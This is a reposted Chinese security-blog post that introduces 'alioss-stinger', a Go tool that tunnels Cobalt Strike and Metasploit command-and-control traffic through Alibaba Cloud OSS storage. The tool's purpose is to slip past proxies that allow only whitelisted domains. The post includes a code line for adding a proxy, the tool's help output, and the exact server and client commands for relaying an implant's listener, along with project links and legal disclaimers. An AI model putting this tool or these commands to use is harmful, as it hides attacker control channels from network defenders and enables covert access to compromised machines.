点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
🌟简介
利用阿里云oss对象存储,来转发http流量实现(cs)Cobalt Strike、msf 上线等 这之间利用阿里云的相关域名进行通信。
Alioss-stinger
利用阿里云oss对象存储,来转发http流量实现(cs)Cobalt Strike、msf 上线等
这之间利用阿里云的相关域名进行通信。
背景
在某次攻防中,内部通过代理服务器上网,且不能访问ip,域名白名单,刚好阿里云、腾讯云在其中,看到github上有个师傅写过的一些腾讯云的代码,但是有个问题,腾讯云的官方库好像不支持认证功能,于是我就照着这个师傅的代码改成了阿里云的版本。
参考:https://github.com/9bie/oss-stinger
修改39行就好,加入内网代理服务器
ossClient, err = oss.New(endPoint, accessKeyId, accessKeySecret, oss.AuthProxy("http://127.0.0.1:8080", "", ""))
如何使用
PS C:UsersxxxDesktopgithubgoalioss-stinger> go run .main.go -h
Usage of C:UsersxxxAppDataLocalTempgo-build3967568892b001exemain.exe:
-address string
监听地址或者目标地址,格式:127.0.0.1:8080
-mode string
client/server 二选一
-osskey string
format: endpoint:accessKeyId:accessKeySecret:bucketName
CS
生成监听本地127.0.0.1:8001的木马:
服务端运行
.alioss-stinger.exe -address 127.0.0.1:8001 -mode server -osskey endpoint:accessKeyId:accessKeySecret:bucketName
客户端运行
.alioss-stinger.exe -address 127.0.0.1:8001 -mode client -osskey endpoint:accessKeyId:accessKeySecret:bucketName
阿里云安全配置
按照这个配置就可以了。https://www.yuque.com/pantom/netsecnote/kyqg65wkmxycfhei
项目地址
https://github.com/pant0m/alioss-stinger原文始发于微信公众号(SecHub网络安全社区):利用阿里云oss对象存储来C2上线
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论